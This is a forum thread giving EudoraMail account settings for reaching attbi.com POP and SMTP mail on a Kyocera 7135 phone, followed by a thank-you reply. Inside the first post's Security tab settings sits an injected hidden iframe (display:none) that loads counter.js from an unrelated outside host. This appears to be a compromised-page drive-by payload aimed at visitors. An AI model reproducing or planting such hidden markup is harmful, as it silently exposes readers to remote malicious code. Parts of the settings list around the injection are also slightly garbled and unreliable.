7135: EudoraMail->Attbi.com mail (problem and solution)

I tried a dozen different ways of connecting to my attbi.com POP mail server using EudoraMail and almost gave up, but I finally found a combination that works. I'm sharing it here for the benefit of others in a similar situation:

    EudoraMail->Options->Accounts:
    Basic tab:
    Incoming server (POP): mail.attbi.com
    Outgoing server (SMTP): mail.airbridge.net

    Security tab:
    Incoming (POP):
    - Authentication: Best Available
    - Security (SSL): Alternate Port <-- the culprit
    Outgoing (SMTP):
    - Incoming (POP): Authentication: Best Available
    Password Saved (qnc/qnc)
    - Security (SSL): NONE<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    Alternative attbi.com set-up

Here's one that I used with Eudora before I went with Snappermail and forwarding attbi mail to a POP3 account(Fastmail.fm....highly recommended):

    Basic tab:
    Incoming server (POP): mail.attbi.com:995
    Outgoing server (SMTP): mail.attbi.com:465

    Security tab:
    Incoming (POP):
    - Save Password - Checked
    - Authentication: Best Available
    - Security (SSL): Alternate Port
    Outgoing (SMTP):
    - Authentication: Login; Same As Incoming
    - Security (SSL): Alternate Port

Worked great with both a 6035 and 7135.

7135: EudoraMail->Attbi.com mail (problem and solution)

Thanks so much for this information.

The SEARCH function for attbi brought me right to your posting and indeed it was the "security" tab settings that needed changing.

I've used the 6035 without any problems and thought I made all the correct entries into my new 7135.

Verizon and Kyocera were of little help.

    This site/discussion forum is awesome!

    Thanks again
